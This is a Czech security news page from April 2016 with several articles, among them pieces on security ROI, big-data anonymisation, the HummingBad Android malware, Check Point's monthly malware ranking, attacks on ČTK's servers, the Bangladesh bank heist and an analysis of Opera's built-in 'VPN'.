Když dostanete od vedení otázku na návratnost investic (ROI) do zabezpečení, jak na ni odpovíte?

Chcete-li se vyzbrojit odpověďmi na tyto otázky, musíte nejprve správně stanovit dopad, jaký by mělo dané riziko na vaši firmu. A chcete-li pochopit dopad, budete muset vědět, jaká aktiva příslušná hrozba postihne (v případě, že událost skutečně nastane), jak rozsáhlé postižení bude a jaká bude souhrnná obchodní hodnota zasažených aktiv.

Při výpočtu hodnoty pro firmu je důležité zvážit informační aktiva stejně jako aktiva infrastruktury. Hodnota vašich informačních aktiv ale nemusí být tak zřejmá jako u aktiv infrastruktury.

Nedávná zpráva společnosti Forrester Research to částečně vysvětluje slovy: „...hodnota informací je procento současného a budoucího obratu, které tyto informace vytvoří, minus přímé a nepřímé náklady na tvorbu, správu a jejich ochranu.“

Pokud se dané riziko stane skutečností, bude dopad na vaši firmu kombinací nákladů spojených s událostí samotnou plus ztracený obrat v důsledku nedostupnosti takových aktiv.

Ponemon Institute nabízí několik užitečných průvodců jako například náklady na vyzrazení osobních dat (například citlivé osobní údaje) podle záznamů. Využijte tyto průvodce, ale vypočítejte také obrat, který vaše firma ztratí v případě nedostupnosti zasažených aktiv.

Při vyjadřování hodnoty v souvislosti s rizikem tuto hodnotu vyčíslete v penězích. Když to uděláte, budete moci porovnat obchodní hodnotu s finančním vyjádřením rizika pomocí stejného měřítka.

To je podstata vyčíslení finanční hodnoty rizika. Vyjádření finanční hodnoty rizik tímto způsobem umožní přizpůsobit bezpečnostní program podnikovým cílům.

Firmy existují proto, aby vydělávaly peníze, takže vyčíslení hodnoty rizik v podobě peněz vám pomůže poměřovat je podle jejich dopadu na vši organizaci.

Nejvyšší vedení chápe ekonomické aspekty mnohem lépe než bezpečnostní rizika. Když mu vysvětlíte své důvody pro zmírnění (či nezmírnění) daného rizika, bude schopné udělat informovanější rozhodnutí, protože to bude v kontextu, kterému rozumí.

Vyjádření finanční hodnoty klíčových rizik

Proces vyjádření finanční hodnoty rizika vyžaduje důkladné pochopení, a to asi nebudete chtít dělat pro každý existující systém a síťové bezpečnostní riziko. Místo toho se zaměřte jen na vyčíslení finanční hodnoty rizik s nejvyšší hodnotou, jako jsou hrozby, které by mohly zasáhnout kritická podniková aktiva a například ovlivnit produktivitu firmy.

K určení peněžní hodnoty rizika je nutné pochopit pravděpodobnost výskytu rizika a také dopad na vaši firmu.

Při určování pravděpodobnosti se zaměřte na konkrétní opatření, která vaše organizace používá ke snížení dopadů daného rizika, versus opatření, jež považujete za potřebné zavést ke zmírnění této hrozby.

Vytvořením poměru již zavedených opatření a opatření, která je třeba ke zmírnění rizika zavést, se blížíme k vyjádření pravděpodobnosti výskytu.

Je ale důležité si uvědomit, že se zaměřujeme jen na konkrétní opatření, která řeší dané riziko (rozhodně nemáme na mysli všechna opatření v rámci vaší organizace). V různých situacích mohou být některá opatření cennější než jiná, takže přiřazujte každému z nich váhu podle zvažovaného scénáře.

Když toto cvičení pak budete později dělat s cílem vyčíslit finanční hodnotu dalších rizik, uvědomte si, že se jak příslušná opatření, tak i jejich odpovídající váhy mohou změnit.

Řekněme, že rizikem, u kterého vyčíslujete hodnotu, je „ochrana před únikem dat“ z vašeho podnikového systému ERP (v tomto příkladu tedy kritická podniková aplikace). Našli jste například devět konkrétních opatření, u kterých se domníváte, že uspokojivě řeší riziko úniku dat.

Každému z nich přiřadíte váhu 1–10 (10 označuje nejvyšší hodnotu). Při hodnocení opatření určíte, které z nich už používáte a které nikoliv (viz tabulku 1)

Tabulka 1: Opatření pro zamezení úniku dat z ERP


Zachování anonymity? S big daty spíše zbožné přání

30.4.2016 Sledování
Pro zachování anonymity osobních informací při shromažďování big dat existují účinné metody. Záleží však z velké míry na tom, jak často se využívají. A většina expertů uvádí, že to není moc často.

Jak anonymní může člověk v dnešním digitálním světě být? Nejde o skupiny hacktivistů, ale o anonymitu průměrných lidí v situaci, kdy se jimi vytvářená data shromažďují v podstatě každým – počínaje marketingem, webovými stránkami, výzkumnými pracovníky, vládními organizacemi atd.

Je shromažďování údajů pro potřeby big dat – i s odstraněním osobních údajů či zašifrováním – stále zranitelné vůči metodám zpětného ztotožnění, které identifikuje jednotlivce až do té míry, že je možné nebo už probíhá vlezlé narušování soukromí?

Nebo lze zachovat jednotlivcům bezproblematickou anonymitu v moři dat, která se používají ke zjišťování trendů, sledování šíření nemoci, určování oblastí s vysokou kriminalitou nebo k dalším záležitostem, jež zlepší hospodářský blahobyt či zdraví populace?

Je anonymita zajištěná?

Nečekejte od zástupců IT a odborníků na soukromí jednomyslnou odpověď. V této oblasti stále probíhají diskuze. Skupina na jedné straně zahrnuje autory dokumentu „Big data a inovace, náprava záznamů: deidentifikace funguje“ z června 2014, kde se uvádí, že soukromí je dostatečně podporované a média by měla přestat přehánět.

Její autoři Daniel Castro a Ann Cavoukian kritizují „zavádějící titulky a výroky v médiích“, které naznačují, že osoby s pouze průměrnými znalostmi a správnými technologickými nástroji dokážou odhalit totožnost osob, jejichž data se anonymizovala.

Chyba způsobující šíření tohoto mýtu je podle nich nikoli v samotných zjištěních prezentovaných výzkumníky v základní literatuře, ale „tendence komentátorů této literatury zveličovat publikovaná zjištění“.

Tvrdí, že správně udělaná anonymizace je prakticky neprůstřelná a snižuje riziko identifikace osob na méně než 1 %, což je méně než riziko narušení soukromí při dolování soukromých informací z vynášeného odpadu, který může obsahovat citlivé osobní informace.

Také argumentují, že neopodstatněný strach ze ztráty anonymity může podkopat „pokrok v oblasti analýz dat, které otevírají možnosti použití anonymizovaných datových souborů způsoby, jež nikdy dříve nebyly možné – třeba pro vytváření značných sociálních a ekonomických přínosů“.

Uznávají však, že aby byl proces anonymizace účinný, nesmí je uskutečňovat povrchním způsobem. A to je podle Pam Dixonové, výkonné ředitelky světového fóra pro soukromí (World Privacy Forum), skutečný problém. Ona a další tvrdí, že mimo kontrolované prostředí akademického výzkumu anonymita a soukromí v podstatě přestaly existovat.

Nedostatky soukromí

Dixonová neoponuje tvrzením o dosažitelné účinnosti ze zmíněného dokumentu, ale upozorňuje, že v reálném světě nedochází k důsledné anonymizaci všech množin dat.

„Ve skutečnosti to lidé nebudou dělat důsledně,“ tvrdí Dixonová a dodává. „Chcete-li získat skutečnou anonymitu při zpracování big dat, musíte použít mimořádně širokou úroveň agregace.“

Pokud se podle ní bavíme jen o údajích shromážděných pro celostátní či lokální trendy, potom lze anonymizace dosáhnout, protože nejde o samotné jednotlivce. Jestliže se však mluví o počtu osob s chřipkou v Praze a jsou k dispozici všechna poštovní směrovací čísla, je to už něco jiného.

Joseph Lorenzo Hall, hlavní technolog Centra pro demokracii a technologie (CDT, Center for Democracy & Technology), souhlasí, že ačkoli důsledná anonymizace je demonstrativně účinná, ve světě sběru dat tento ideální stav nevzniká. Jednou z příčin podle něj je, že skutečně neprůstřelná anonymizace snižuje užitečnost údajů.

„Podstatnou vlastností těchto souborů dat, které umožňují opětovnou identifikaci, je, že záznamy chování téhož jedince jsou vzájemně propojené. To je velká část přínosu uchovávání těchto záznamů,“ uvádí Hall.

Velkým problémem je podle něj zveřejňování souborů dat, které byly špatně anonymizované, a také sdílení údajů, u nichž se předpokládá nepřítomnost osobních informací, ale ve skutečnosti obsahují nějaký druh trvalého identifikátoru, který lze triviálně přiřadit k odpovídajícím osobám.

Zatímco některé shromažďování dat skutečně směřuje k ekonomickému prospěchu či zdraví obyvatelstva, Hall poznamenává, že v mnoha případech tomu tak není. „Některé maloobchody používají sledování Wi-Fi, v rámci něhož se využívá MAC adresa vašeho přístroje (trvalý síťový identifikátor), aby vás ve svém obchodě pečlivěji sledovali. To je důvod, proč Apple začal tyto adresy ‚randomizovat‘.“

Paul O‘Neil, konzultant pro zabezpečení informací ve společnosti IDT911 Consulting, má téměř totožný názor. „Pokud se anonymizace udělá dobře, potom to skutečně může fungovat. To slovo ‚pokud‘ je však mnohem významnější podmínka, než si většina lidí uvědomuje.“

Co má být anonymní?

Raul Ortega, manažer společnosti Protegrity, upozorňuje také na to, jak nevyrovnaná je ochrana soukromých dat. „Zatímco se zabezpečení kreditních karet zlepšuje, v oblasti anonymizace hromady citlivých osobních údajů, které existují v každé firmě, se toho dělá jen velmi málo.“

Částí tohoto problému může být podle právních expertů určitý aspekt sémantiky, který vede k obecnému zmatku. „Musíme mít jasno v tom, co máme na mysli, když prohlašujeme data za anonymní,“ upozorňuje Kelsey Finchová, poradkyně fóra pro budoucnost soukromí (FPF, Future of Privacy Forum)...


Úniky dat už dokáže zvládnout i běžný správce, tvrdí Safetica

29.4.2016  Ochrany
Novou – sedmou -- verzi svého řešení Safetica pro prevenci úniku dat představil stejnojmenný výrobce. Oproti předchůdci nabídne kromě zjednodušení použití i vylepšení v oblasti tzv. okamžité ochrany dat (zabezpečení citlivých firemních dokumentů bez omezení provozu) či lepší podporu více platforem.

Sedmá verze přináší usnadnění a zjednodušení procesu instalace a správy. Oproti šestce to prý v základní variantě zvládne i běžný IT administrátor. Instalace zároveň automaticky nakonfiguruje systém, správce hned získá přehled bezpečnostních rizik, která se navíc mohou zasílat jako automatické notifikace do e-mailu.

Safetica 7 zavádí i nový nástroj, webovou konzoli „WebSafetica“, která umožňuje přehledným způsobem zjistit co se děje v organizaci. Je dostupná z každého prohlížeče komukoliv uvnitř firmy, kdo disponuje přístupovými právy.

Oproti tomu desktopová konzole je vhodný nástroj pro administrátory pro konfiguraci firemních bezpečnostních politik. Řešení interní bezpečnosti je díky těmto nástrojům dosažitelné pro každou společnost.

Safetica 7 nově umožňuje správu i v operačním systému Windows 10. Je tak dostupná nejen pro systémy s Windows 7-10, ale také na terminálových serverech jako jsou Microsoft Terminal Server nebo Citrix XenApp, a na mobilních platformách Android a iOS.

Mezi další vylepšení patří i rozšíření šifrování disků pomocí BitLocker, takže pokud dojde například ke ztrátě notebooku nebo USB flash disku, nikdo nepovolaný se nedostane k citlivým firemním dokumentům. Produkt také automaticky zálohuje sbíraná data.


Škodlivý kód cílí na mobily, šíří se jako lavina

29.4.2016 Viry
Doslova jako lavina se v posledních týdnech začal šířit internetem nový škodlivý kód zvaný HummingBad, který se zaměřuje na chytré telefony s operačním systémem Android. Když se virus v mobilním přístroji zabydlí, převezme nad ním absolutní kontrolu. Před hrozbou varovali bezpečnostní analytici společnosti Check Point.
HummingBad se může šířit jako příloha nevyžádaného e-mailu, stejně tak může číhat na podvodných webech. „Tento malware se zaměřuje na zařízení se systémem Android. Vytváří trvalý rootkit na zařízení,“ upozornil David Řeháček, bezpečnostní odborník ze společnosti Check Point.

Právě zmiňovaný rootkit, tedy schopnost viru se v zařízení maskovat, velmi znesnadňuje možnost jeho odhalení na napadeném zařízení. Ve chvíli, kdy se HummingBad na mobilním zařízení zahnízdí, začne dál škodit. „Instaluje podvodné aplikace a umožňuje další škodlivé aktivity, jako například instalace keyloggerů, krádeže přihlašovacích údajů a obcházení šifrování e-mailů pro lepší zachycení podnikových dat,“ konstatoval Řeháček.

Ukazuje to na velmi rychlý růst útoků na mobilní zařízení se systémem Android.
bezpečnostní odborník David Řeháček
Jinými slovy počítačoví piráti převezmou nad napadeným přístrojem naprostou kontrolu. Mohou jen vyčkávat a sledovat aktivitu uživatele, stejně tak ale dovedou odchytávat zprávy týkající se internetového bankovnictví. Teoreticky tedy mohou uživatele připravit o peníze.

Bezpečnostní experti bijí na poplach především proto, že nový mobilní virus se šíří neskutečně rychle. „V únoru se vůbec poprvé dostal do Top 10 škodlivých kódů mobilní malware, v březnu trend pokračoval a HummingBad byl šestým nejčastějším malwarovým útokem na světě,“ podotkl Řeháček.

„Přestože byl HummingBad objeven výzkumníky společnosti Check Point až v únoru. Ukazuje to na velmi rychlý růst útoků na mobilní zařízení se systémem Android,“ uzavřel bezpečnostní odborník.

Android pod palbou kyberzločinců
Na zmiňovanou mobilní platformu od společnosti Google se skutečně počítačoví piráti zaměřují stále častěji. Zkraje dubna se například objevila podvodná aplikace vydávající se za aktualizaci klienta sociální sítě Facebook. Ta cílila opět na Android. 

Před tímto nezvaným návštěvníkem v chytrých telefonech varovali zástupci Air Banky: „Pokusy útočníků nás nepřestávají překvapovat. Nově to zkouší tak, že vám s pomocí viru zablokují mobilní aplikaci pro přístup na Facebook a nabídnou vám instalaci nové.“

„Pokud se vám něco takového stane, rozhodně nic neinstalujte. Jinak by útočníci mohli získat přístup k vašim ověřovacím SMS, které vám chodí pro potvrzování plateb. Místo toho raději rovnou celý telefon resetujte do továrního nastavení,“ stojí v doporučení banky.


Nebezpečné viry napadly počítače německé jaderné elektrárny

29.4.2016 Viry
Kontrola v bavorské jaderné elektrárně Gundremmingen odhalila viry v několika počítačích a také v systému modelování pohybu palivových tyčí. Energetický koncern RWE, který je většinovým majitelem zařízení, tvrdí, že bezpečnost provozu ohrožena nebyla a že škodlivé programy nebyly v žádném systému obsluhujícím reaktory, napsal ve čtvrtek portál BBC.
Viry personál elektrárny odhalil během přípravy aktualizace kontrolních systémů bloku B, který je v současné době odpojen kvůli plánované údržbě. Škodlivý software byl nalezen i na 18 USB úložných zařízeních. Technici nyní z bezpečnostních důvodů provádějí inspekci více než tisícovky počítačů v komplexu.

Mezi zjištěnými viry byly například dobře známé programy W32.Ramnit a Conficker. Ramnit slouží ke vzdálenému přístupu do napadeného počítače a Conficker sbírá přihlašovací a bankovní údaje.

Pikantní na tom je, že Conficker není žádná nová hrozba. Na počítače s Windows útočí již od konce roku 2008 a drtivá většina antivirových programů si s tím dovede poradit. Vše tedy nasvědčuje tomu, že v bavorské jaderné elektrárně Gundremmingen zcela podcenili zabezpečení počítačových systémů.

RWE v reakci na to uvedla, že žádné vyzrazení citlivých údajů ani zneužití počítačů nehrozilo, neboť stroje nebyly připojené k internetu.


Jaký malware aktuálně útočí v Česku?

28.4.2016 Viry
Seznam nejčastěji použitého škodlivého kódu v Česku ke kyberútokům na podnikové sítě a mobilní zařízení, uveřejnil Check Point. Zároveň zveřejnil i žebříček zemí, které jsou nejčastěji terčem kyberútoků – ČR sice v současnosti figuruje až na 95. pozici, je to ale meziměsíčně posun o 14. míst nahoru.

V únoru se vůbec poprvé dostal do Top 10 škodlivých kódů mobilní malware, v březnu trend pokračoval a HummingBad byl 6. nejčastějším malwarovým útokem na světě.

Poprvé byl mobilní škodlivý kód také v Top 10 za celé čtvrtletí, přestože byl HummingBad objeven výzkumníky společnosti Check Point až v únoru. Ukazuje to na velmi rychlý růst útoků na mobilní zařízení se systémem Android.

Check Point v průběhu března identifikoval více než 1 300 různých malwarových rodin, což je drobný pokles oproti předchozímu měsíci. To ovšem neznamená, že by byl březen bezpečnějším měsícem, jen to ukazuje na skutečnost, že kyberzločinci nemusí vyvíjet zcela nový malware pro útočné aktivity. Prostě jen udělají drobné změny v existujících malwarových rodinách, které umožní aktualizovanou variantou obejít tradiční bezpečnostní opatření.

Ukazuje se tak nutnost používat vyspělá preventivní opatření proti hrozbám a řešení pro prevenci mobilních hrozeb na úrovni sítí, koncových bodů a mobilních zařízení, aby došlo k zastavení škodlivého kódu už v předinfekční fázi.

Conficker byl v březnu nejrozšířenější malwarovou rodinou a byl zodpovědný za 20 % zaznamenaných útoků, vir Sality za 9,5 % útoků a Cutwail za 4 %. 10 nejčastějších mawlarových rodin bylo zodpovědných za více než polovinu zaznamenaných útoků.

↔ Conficker: Červ umožňuje vzdálené operace a stahování malwaru. Infikovaný počítač je pod kontrolou botnetu a je ve spojení s C&C serverem, aby mohl přijímat další pokyny.
↔Sality: Vir, který umožňuje útočníkům vzdálené ovládání a stahování a instalování dalších škodlivých kódů do infikovaných systémů. Sality se snaží maskovacími technikami vyhnout detekci a působit tak v systému co nejdéle.
↑ Cutwail: Botnet nejčastěji využívaný pro rozesílaní nevyžádaných e‑mailů a DDOS útoky. Jakmile je malware nainstalovaný, boty se připojí přímo k C&C serveru a přijímají pokyny o e‑mailech, které mají rozesílat. Jakmile je úkol hotov, bot hlásí spammerům přesné statistiky.

Check Point také identifikoval nejčastější mobilní malware v březnu 2016, tři nejrozšířenější malwarové rodiny cílily na zařízení se systémem Android:

↔ HummingBad - Malware zaměřený na zařízení se systémem Android. Vytváří trvalý rootkit na zařízení, instaluje podvodné aplikace a umožňuje další škodlivé aktivity, jako například instalace keyloggeru, krádež přihlašovacích údajů a obcházení šifrování e-mailů pro lepší zachycení podnikových dat.

↔ AndroRAT: Malware, který je schopen přibalit se k nějaké legitimní mobilní aplikaci a nainstalovat se bez vědomí uživatele, což hackerům umožňuje získat vzdáleně plnou kontrolu nad zařízením se systémem Android.
↑ Iop: Malware zaměřený na zařízení se systémem Android, který instaluje aplikace a zobrazuje nadměrné množství reklam pomocí root přístupu k mobilnímu zařízení. Množství reklamy a nainstalovaných aplikací neumožňuje uživateli používat přístroj jako obvykle.

„Po překvapivém únorovém umístění mobilního malwaru HummingBad v Top 10 všech malwarových rodin pokračuje růst těchto útoků i v březnu. Skutečnost, že tato dříve neznámá hrozba je již v první desítce světových malwarových rodin za celé první čtvrtletí roku 2016 ukazuje, jak reálné a rychlé nebezpečí je nárůst mobilního malwaru. Závislost organizací na mobilních zařízeních roste každým dnem, ale mobilní bezpečnost i nadále zaostává za zabezpečením sítí,“ říká Nathan Shuchami, ředitel prevence hrozeb ve společnosti Check Point.

Index hrozeb vychází z online mapy kybernetických hrozeb ThreatCloud World Cyber Threat Map, která v reálném čase sleduje, jak a kde po celém světě probíhají kybernetické útoky. Databáze ThreatCloud analyzuje více než 250 milionů adres a detekuje případné nakažení boty, obsahuje přes 11 milionů malwarových signatur a více než 5,5 milionu infikovaných webových stránek a identifikuje miliony malwarových typů každý den.

Top 10 malwarových rodin v České republice – březen 2016

Malwarová rodina

Popis

Conficker

Conficker je počítačový červ, který se zaměřuje na operační systém Windows. Využívá zranitelnosti v operačním systému a zkouší odhadnout administrátorské heslo pro další šíření a vytvoření botnetu. Infekce umožňuje útočníkovi získat přístup k osobním údajům uživatelů, jako jsou bankovní údaje, čísla kreditních karet nebo hesla. Červ původně cílil na uživatele komunikačních stránek, jako jsou Facebook, Skype a e-mailové stránky.

Graftor

Graftor je adware a zneužívá webový prohlížeč. Svými vlastnostmi se podobá trojskému koni. Může být použit jako nástroj pro stažení dalších škodlivých kódů. Je také znám pro skrývání spustitelných příkazů a DLL v PNG souborech, aby se vyhnul detekci. Některými dodavateli je vnímán jen jako nežádoucí program, ale Graftor má rootkitové schopnosti a C&C funkce, které z něj dělají mnohem nebezpečnější malware, než je jen obyčejný adware.

Cryptodef

Cryptodef je ransomware, která šifruje nebinární uživatelské soubory, jako jsou texty, dokumenty, obrázky, videa a další. Následně zobrazí textový soubor s pokyny k dešifrování souborů a pokyny pro platbu za použití dešifrovacích služeb. Obvykle je stažen jiným malwarem, které je již v počítači nainstalovaný, nebo je stažen přímo během procházení škodlivých nebo infikovaných webových stránek.

 

Angler ek

Angler byl poprvé detekován na konci roku 2013. Na začátku roku 2015 se jednalo o nejširší exploit kit a platí to i v roce 2016. Angler je známý pro rychlé využívání zranitelností nultého dne, někdy během pouhých několika dnů od prvního zveřejnění. Infekce začíná, když je prohlížeč přesměrován na vstupní infikovanou stránku, která obsahuje dobře maskovaný JavaScript. Úvodní stránka identifikuje verzi plug-inu v infikovaném počítači, takže lze využít dostupné zranitelnosti. Snaží se také zjistit, zda je zranitelný systém virtuální stroj. K útokům je nejčastěji využíván Flash, ale aktivní slabiny jsou také pro Javu, Silverlight, Acrobat nebo staré verze Internet Exploreru.

Nlbot

Nlbot je backdoor, který se zaměřuje na platformu Windows. Malware rozesílá systémové informace a přijímá různé příkazy z řídicího serveru, které mohou umožnit útočníkovi nahrávat/stahovat soubory, spouštět vzdáleně shell, získat protokoly, získat informace o peer botech, aktualizovat malware a řadu dalších věcí. Malware se dostane do Explorer.exe a dalších procesů pro skrývání své aktivity. Vytváří různé položky v registru, aby se aktivoval hned po restartování systému.

Ponmocup

Ponmocup je trojan, který se zaměřuje na platformu Windows. Malware modifikuje soubory v infikovaném systému, aby zabránil v přístupu k populárním torrentovým vyhledávačům. Do infikovaného systému také stahuje další škodlivé soubory.

Ctb-locker

CTB-Locker je ransomware, který se zaměřuje na platformu Windows. Zašifruje všechna uživatelská data a za dešifrování požaduje platbu. Malware se obvykle šíří jako spam s nebezpečnou přílohou ZIP nebo CAB. Malware je s největší pravděpodobností vyvíjen a distribuován ruskými kyberzločinci a je prodáván většinou také ruským subjektům. Jako označení se používají i další názvy, například Critroni nebo Onion. Písmena CTB ve jméně znamenají „Curve-Tor-Bitcoin“. Elliptic Curve pro šifrování a Tor a Bitcoin pro anonymitu výkupného.

Pbot

Pbot je škodlivý program typu „zadní vrátka“, který se zaměřuje na platformu Windows. Malware je navržen tak, aby útočníkům poskytl vzdálenou kontrolu nad infikovaným počítačem.

Cutwail

Cutwail je botnet využívaný pro rozesílání e-mailového spamu. Bot se připojí přímo k C&C serveru a přijímá pokyny o e-mailech, které má rozesílat. Po dokončení úkolu reportuje spammerům přesné statistiky, kolik e-mailů bylo doručeno a kolik hlásilo chybu. Cutwail je využíván také pro DDoS útoky.

Locky

Locky je ransomware, který se zaměřuje na platformu Windows. Malware posílá systémové informace na vzdálený server a přijímá šifrovací klíč pro zašifrování souborů v infikovaném systému. Malware požaduje jako výkupné za odemčení souborů platbu ve formě digitální měny bitcoin. Navíc přidává informaci i do registru, aby jej nebylo možné odstranit restartováním systému.


Další útok. Po webu ČSSD hlásí napadení i servery ČTK

27.4.2016 Zdroj: Lupa.cz  Počítačový útok

Po webu sociálních demokratů se pod palbu internetových útoků dostaly i weby České tiskové kanceláře.
Klienti ČTK by se měli připravit na změnu hesel. Veřejnoprávní tisková agentura se totiž podle serveru HlídacíPes.org dostala v minulých dnech pod palbu internetového útoku. Dnes ráno to potvrdila i samotná agentura.

Poslední měl přijít během včerejší noci, který na čas vyřadil stránky z provozu. Zpravodajský servis ale podle všeho ohrožen nebyl. „Některé servery ČTK se v minulých dnech staly terčem útoku hackerů. Cílený útok v noci na dnešek chvílemi omezil dostupnost některých webových stránek a hackeři se také pravděpodobně dostali k některým údajům z databáze jednoho ze serverů. Může jít o hesla některých externích uživatelů. Hesla jsou uložena v šifrované podobě, nelze ale vyloučit, že stažená hesla se podaří prolomit,“ tvrdí oficiální prohlášení agentury.

Podle interního mailu, který má redakce HlídacíPes.org k dispozici, ale bylo útoků víc a odehrály se v několika posledních dnech. „Bohužel také zatím nemůžeme vyvrátit tvrzení hackerů, že stáhli z našich serverů data a hesla. Pokud k tomu došlo, jedná se pravděpodobně o hesla části registrovaných uživatelů Fotobanky,“ píše se v e-mailu, který rozesílal šéf IT oddělení.

Situaci agentura řeší ve spolupráci s externím partnerem. „Zablokovali jsme adresy, ze kterých byly útoky dosud vedeny, analyzujeme uložené záznamy a v nejbližší době zavedeme některá opatření, která by měla riziko dále snížit,“ uvádí interní materiál. Podle ČTK se na webových serverech neukládají žádné citlivé údaje zaměstnanců ani smluvních partnerů, taková data tedy zcizena být nemohla.

Jde už o třetí útok během tohoto týdne. Během noci na včerejšek byly DoS útokem sestřeleny stránky vládních sociálních demokratů a web byl nahozen až včera před obědem. Podle ČTK šlo o stejné útočníky, kteří se zaměřili na servery veřejnoprávní tiskové agentury.

Kromě toho včera ohlásil hack debatní server Lapiduch. „Domníváme se, že útočník získal databázi uživatelů, obsahující e-mailové adresy a přístupová hesla na Lapiduch,“ informuje dosud titulní stránka Lapiduch.cz.


Snažili se ušetřit. Miliardy korun naservírovali hackerům na zlatém podnosu

27.4.2016 Hacking
Hackerům se loni podařil opravdový majstrštyk. Z bangladéšské centrální banky odcizili 81 miliónů dolarů, tedy v přepočtu více než 1,9 miliardy korun. Po několikaměsíčním vyšetřování vyplouvají na povrch jen těžko pochopitelné závěry. Například to, že bankéři šetřili a nepoužívali firewall, napsala v minulých dnech agentura Reuters. Jinými slovy tak hackerům banka naservírovala peníze doslova na zlatém podnosu.
Firewall je síťové zařízení, které slouží k zabezpečení počítačových sítí. Jeho hlavním úkolem je tedy bránit počítače a servery v rámci dané sítě, aby se na ně nedostaly škodlivé viry a další nezvaní návštěvníci.

Podobná zařízení se běžně instalují i v malých firmách, protože i v nich administrátoři vědí, jak velké škody mohou počítačoví piráti na dálku napáchat. Bohužel počítačoví experti starající se o systém bangladéšské centrální banky, jejíž účet byl mimochodem veden u americké Federální rezervní banky (FED) v New Yorku, tolik obezřetní nebyli.

Podle vyšetřovatelů je to jeden z hlavních důvodů, proč se podařilo hackerům tolik peněz odcizit. „Bylo by tam daleko těžší proniknout, kdyby měli firewall,“ konstatoval podle agentury Reuters Mohammad Shah Alam, který měl v rámci bangladéšské policie případ na starosti.

Ušetřili pár stovek dolarů
Podle něj bylo zřejmé, že se lidé starající o miliardové transakce snažili ušetřit. Další síťová technika, kterou vyšetřovatelé kontrolovali, totiž byla pořízena z druhé ruky. Například nákupem síťových přepínačů z bazaru přitom banka ušetřila maximálně tak pár stovek dolarů.

Není pochyb o tom, že hackeři si šli pro peníze najisto. Útočili totiž během víkendu, kdy přece jen komunikace mezi oběma institucemi – bangladéšskou centrální bankou a americkým FED – vázne. FED zaplavili množstvím žádostí o převod, přičemž se vydávali právě za bangladéšské bankéře.

FED jakékoli pochybení opakovaně odmítal. U všech požadovaných transakcí totiž byly použity tzv. SWIFT kódy, prostřednictvím kterých se jednotlivé banky identifikují. Všechny SWIFT kódy skutečně používali i bangladéšští bankéři, proto pracovníci FED neměli šanci poznat, že ve skutečnosti komunikují s hackery.

Kdyby banka měla firewall, patrně by se hackeři ke SWIFT kódům vůbec nemohli dostat.

Škoda mohla být ještě vyšší
Z účtů se původně snažili odčerpat 951 miliónů dolarů. I když se jim nakonec podařilo odčerpat pouze 81 miliónů, jde o jednu z největších bankovních loupeží v celé historii internetu.

Získané peníze hackeři převedli na různé účty na Filipínách. Vyšetřovatelé zjistili, že velká část z nich se protočila v rámci tamních kasin. Zda se ukradené milióny podařilo získat zpět, však není doposud jasné.

Guvernér bangladéšské centrální banky Atiur Rahmán rezignoval už loni, prakticky okamžitě po útoku hackerů.


Opera představila VPN, která vlastně není VPN. Takhle funguje

27.4.2016 Zdroj: Lupa.cz Zabezpečení

Opera Software ve své tiskové zprávě tvrdí, že jejich “VPN” je lepší, než tradiční VPN. No, jak se to vezme.
25.4. 16:15 – doplněn odkaz na The Oprah Proxy a informace o připojování přes HTTPS
Po několika dlouhých letech jsme se včera opět setkali a dnes jsme spolu strávili noc. Pamatuji si ji jako dívku, kterou bych ani za kus naleštěného chromu nevyměnil, ale dnes ráno jsem měl trochu hořko v ústech. Jmenuje se Opera a její rodiče se snaží dohnat vlak, který jim tak trochu ujel, když svého potomka v roce 2013 přestěhovali do čtvrti, kde vládne famílie Blink, aby s nimi Opera mohla začít nový život.

Opera se tento rok docela rozjela. V únoru Norská firma oznámila, že ji kupuje skupina čínských investorů, v březnu Opera přišla s blokováním reklam přímo zabudovaným do prohlížeče a minulý týden oznámila, že do svého prohlížeče přidala neomezenou „VPN“ zdarma. Ta je zatím jen ve vývojářské verzi Opery pro Windows, Mac a Linux a jedná se o produkt postavený na základech firmy SurfEasy, která nově patří do stále ještě norské rodiny. Uvidíme, s čím Opera přijde v květnu.

VPN (Virtual Private Network) je ta věc, kterou možná používáte v situaci, kdy chcete nebo musíte pracovat, ale máte tělo oslabené natolik, že si sotva dojdete pro nabíječku na laptop. Převážně velké nadnárodní firmy používají VPN, aby zpřístupnily své interní služby i lidem, kteří zrovna pracují z domova. VPN byste také měli používat vždy, když jste připojeni na nějakou veřejnou Wi-Fi, protože nikdy nevíte, komu ta síť patří a jaké má úmysly.

Jenže VPN v Opeře není tak docela VPN, i proto jsem tu zkratku výše dal do uvozovek. Klasická VPN totiž chrání všechna spojení, která jdou z vašeho počítače, včetně všech webových prohlížečů, outlooků a skajpů. VPN v Opeře zabezpečí jen Operu, respektive požadavky odcházející z a odpovědi vracející se do Opery. VPN v Opeře nezabezpečí jiné prohlížeče ani ty skajpy a outlooky. Potud asi v pořádku, ačkoliv to tisková zpráva Opery nezmiňuje. Jen na tohle musíte pamatovat, až si budete chtít ve vaší oblíbené kavárně stáhnout nově došlé e-maily do vašeho poštovního programu.

Sama Opera trochu tápe v tom, jak novou vlastnost nazývat, v nastavení sice najdete “povolení VPN”, ale hned pod tím je poznámka, že “zabezpečenou proxy poskytuje SurfEasy”. Zajímavé je i to, že když VPN zapnete, tak v prohlížeči nemůžete měnit nastavení proxy serverů. To trochu zavání, u klasických VPN takovéto omezení nenajdete.

Nastavení Opery s vyhledáním slova “proxy”
To zaujalo i Ondreje Galbavého a na Twitteru si lehce rýpnul do zástupce technického ředitele (Deputy Chief Technology Officer) Opery Bruce Lawsona, ale ten ho ujistil, že to opravdu je VPN.

A tady začíná moje část příběhu, to totiž zaujalo i mě a tak jsem si stáhnul vývojářskou Operu, spustil packetový sniffer a ponořil se do tajů prohlížečů postavených na Chromiu, abych zjistil, co to vlastně ta VPN od Opery je a…

Jak to funguje?

Jakmile v nastavení Opery zaškrtnete, že chcete VPN povolit, tak prohlížeč odešle několik požadavků metodou post na https://api.surfeasy.com, aby zjistil, kam a na jakou “VPN” se vlastně má připojit.

První požadavek jde na https://api.surfeasy.com/v2/re­gister_subscriber a z odpovědi serveru browser získá několik cookie, které později posílá pro ověření zpět na SurfEasy API. Jsou to cookie subscriber_credentials, api_session (ta se v průběhu posílání požadavků mění) a _proxy_manager_session31. V požadavku jsou vidět hlavičky SE-Client-Type a SE-Client-API-Key, to jsou pravděpodobně hodnoty uvedené přímo v browseru, alespoň to tak vypadá po prozkoumání rozšíření SurfEasy VPN for Opera, ze kterého nejspíš “VPN” v Opeře vychází.

Api.CLIENT_TYPE_OPERA = 'se0204';
Api.CLIENT_TYPE_CHROME = 'se0205';

